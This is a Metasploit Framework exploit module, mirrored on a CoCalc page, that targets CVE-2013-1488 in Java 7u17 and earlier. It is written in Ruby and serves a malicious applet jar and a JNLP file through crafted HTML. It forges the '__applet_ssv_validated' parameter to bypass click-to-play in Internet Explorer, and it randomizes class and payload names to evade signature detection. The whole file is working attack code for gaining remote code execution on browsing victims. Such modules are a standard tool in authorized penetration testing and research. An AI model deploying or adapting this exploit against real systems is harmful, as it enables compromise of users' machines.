CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_driver_manager.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  #include Msf::Exploit::Remote::BrowserAutopwn

13
  #autopwn_info({ :javascript => false })

14


15
  def initialize( info = {} )

16


17
    super( update_info( info,

18
      'Name'          => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',

19
      'Description'   => %q{

20
          This module abuses the java.sql.DriverManager class where the toString() method

21
        is called over user supplied classes from a doPrivileged block. The vulnerability

22
        affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer

23
        and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java

24
        Web Start can be launched automatically through the ActiveX control. Otherwise, the

25
        applet is launched without click-to-play bypass.

26
      },

27
      'License'       => MSF_LICENSE,

28
      'Author'        =>

29
        [

30
          'James Forshaw', # Vulnerability discovery and Analysis

31
          'juan vazquez' # Metasploit module

32
        ],

33
      'References'    =>

34
        [

35
          [ 'CVE', '2013-1488' ],

36
          [ 'OSVDB', '91472' ],

37
          [ 'BID', '58504' ],

38
          [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],

39
          [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],

40
          [ 'ZDI', '13-076' ]

41
        ],

42
      'Platform'      => %w{ java linux osx win },

43
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

44
      'Targets'       =>

45
        [

46
          [ 'Generic (Java Payload)',

47
            {

48
              'Platform' => ['java'],

49
              'Arch' => ARCH_JAVA,

50
            }

51
          ],

52
          [ 'Windows x86 (Native Payload)',

53
            {

54
              'Platform' => 'win',

55
              'Arch' => ARCH_X86,

56
            }

57
          ],

58
          [ 'Mac OS X x86 (Native Payload)',

59
            {

60
              'Platform' => 'osx',

61
              'Arch' => ARCH_X86,

62
            }

63
          ],

64
          [ 'Linux x86 (Native Payload)',

65
            {

66
              'Platform' => 'linux',

67
              'Arch' => ARCH_X86,

68
            }

69
          ],

70
        ],

71
      'DefaultTarget'  => 0,

72
      'DisclosureDate' => '2013-01-10'

73
    ))

74
  end

75


76


77
  def setup

78
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "Exploit.class")

79
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

80
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "FakeDriver.class")

81
    @driver_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

82
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "FakeDriver2.class")

83
    @driver2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

84
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object")

85
    @object_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

86
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver")

87
    @driver_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

88


89
    @exploit_class_name = rand_text_alpha("Exploit".length)

90
    @exploit_class.gsub!("Exploit", @exploit_class_name)

91


92
    @jnlp_name = rand_text_alpha(8)

93


94
    super

95
  end

96


97
  def jnlp_file

98
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

99


100
    jnlp = %Q|

101
<?xml version="1.0" encoding="utf-8"?>

102
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">

103
  <information>

104
    <title>Applet Test JNLP</title>

105
    <vendor>#{rand_text_alpha(8)}</vendor>

106
    <description>#{rand_text_alpha(8)}</description>

107
    <offline-allowed/>

108
  </information>

109


110
  <resources>

111
    <j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />

112
    <jar href="#{rand_text_alpha(8)}.jar" main="true" />

113
  </resources>

114
  <applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">

115
    <param name="__applet_ssv_validated" value="true"></param>

116
  </applet-desc>

117
  <update check="background"/>

118
</jnlp>

119
    |

120
    return jnlp

121
  end

122


123
  def on_request_uri(cli, request)

124
    print_status("handling request for #{request.uri}")

125


126
    case request.uri

127
    when /\.jnlp$/i

128
      send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })

129
    when /\.jar$/i

130
      jar = payload.encoded_jar

131
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)

132
      jar.add_file("FakeDriver.class", @driver_class)

133
      jar.add_file("FakeDriver2.class", @driver2_class)

134
      jar.add_file("META-INF/services/java.lang.Object", @object_services)

135
      jar.add_file("META-INF/services/java.sql.Driver", @driver_services)

136
      metasploit_str = rand_text_alpha("metasploit".length)

137
      payload_str = rand_text_alpha("payload".length)

138
      jar.entries.each { |entry|

139
        entry.name.gsub!("metasploit", metasploit_str)

140
        entry.name.gsub!("Payload", payload_str)

141
        entry.data = entry.data.gsub("metasploit", metasploit_str)

142
        entry.data = entry.data.gsub("Payload", payload_str)

143
      }

144
      jar.build_manifest

145


146
      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })

147
    when /\/$/

148
      payload = regenerate_payload(cli)

149
      if not payload

150
        print_error("Failed to generate the payload.")

151
        send_not_found(cli)

152
        return

153
      end

154
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

155
    else

156
      send_redirect(cli, get_resource() + '/', '')

157
    end

158


159
  end

160


161
  def generate_html

162
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

163


164
    # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass

165
    # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass

166
    html = %Q|

167
    <html>

168
    <body>

169
    <object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>

170
    <param name="app" value="#{jnlp_uri}">

171
    <param name="back" value="true">

172
    <applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>

173
    </object>

174
    </body>

175
    </html>

176
    |

177
    return html

178
  end

179
end

180


181